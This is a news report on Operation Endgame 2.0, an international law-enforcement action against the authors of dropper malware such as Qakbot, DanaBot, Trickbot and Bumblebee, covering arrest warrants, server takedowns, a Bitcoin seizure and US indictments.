Operation Endgame 2.0: 20 arrest warrants, hundreds of servers put out of action

International law enforcement agencies continue to take action against malware authors. As part of "Operation Endgame 2.0", the security authorities from Germany – the BKA and the Public Prosecutor General's Office in Frankfurt am Main – have now hit the cyber criminals hard. In Germany alone, the authorities have taken 50 servers offline and 650 domains are no longer under the control of the cyber criminals.

Thirty-seven suspects have been identified by investigators and twenty international arrest warrants have been issued. In addition, the Frankfurt Public Prosecutor General's Office (Central Office for Combating Cybercrime, ZIT) is publicly searching for the suspected cybercriminals. It is looking for a total of 18 suspected members of the Trickbot and Qakbot groups using wanted posters. However, they are all Russian citizens and are therefore likely to be beyond the reach of Western justice. Nevertheless, the suspects' room for maneuver is reduced, and they are also likely to be missing some small change in the crypto wallet: Bitcoin with a total value of the equivalent of 3.5 million euros also went into the net of the investigators.

The investigators also attacked the technical infrastructure of the malware authors: They removed a total of 300 servers from the perpetrators' access, according to the press release – so took them offline or took them over. Fifty of the servers were located in Germany. It was only yesterday, Thursday 22 May, that Microsoft and Europol announced that they had paralyzed the command & control infrastructure of the Infostealer malware Lumma.

Droppers in the investigators' sights

The focus of the investigation is on the malware groups and variants Bumblebee, Latrodectus, Qakbot, DanaBot, HijackLoader, Warmcookie and Trickbot, all of which are droppers for downloading further malware such as ransomware. This is no coincidence, but a strategy: the authorities want to start at the front link of the "kill chain", the initial access to attacked systems. This often happens through malware loaders that disguise themselves as legitimate downloads or are executed by the victim themselves via "clickfix" attacks using alleged captchas. If this initial infection is prevented, the criminals cannot carry out further actions such as ransomware infections in the first place, the investigators explain.

BKA President Holger Münch is satisfied: "Our strategies work – even in the supposedly anonymous darknet". Senior public prosecutor Krause, head of the ZIT, can be quoted with a positive interim conclusion: "International cooperation between law enforcement authorities to combat cybercrime is working and is constantly being further developed."

US Department of Justice brings charges against malware authors

The US authorities are also not idle in the context of Operation Endgame 2.0. The US Department of Justice has filed charges against the alleged main author of Qakbot, Rustam G., for his involvement in various attacks on companies in the United States and Canada. Together with his accomplices, he infected their computers with Qakbot and other malware and used it to execute ransomware such as Prolock, Doppelpaymer, REvil, Conti, Black Basta and Cactus. A public prosecutor in California has also brought charges against a total of 16 suspects who are alleged to have developed and used the DanaBot malware. Alexandr S. and Artem K. from Novosibirsk, Russia, together with their accomplices, are alleged to have caused over 50 million US dollars in damage to over 300,000 computers.

The second round of Operation Endgame follows its launch almost exactly one year ago, at the end of May 2024, when ten international arrest warrants were issued and four people were provisionally arrested.

(cku)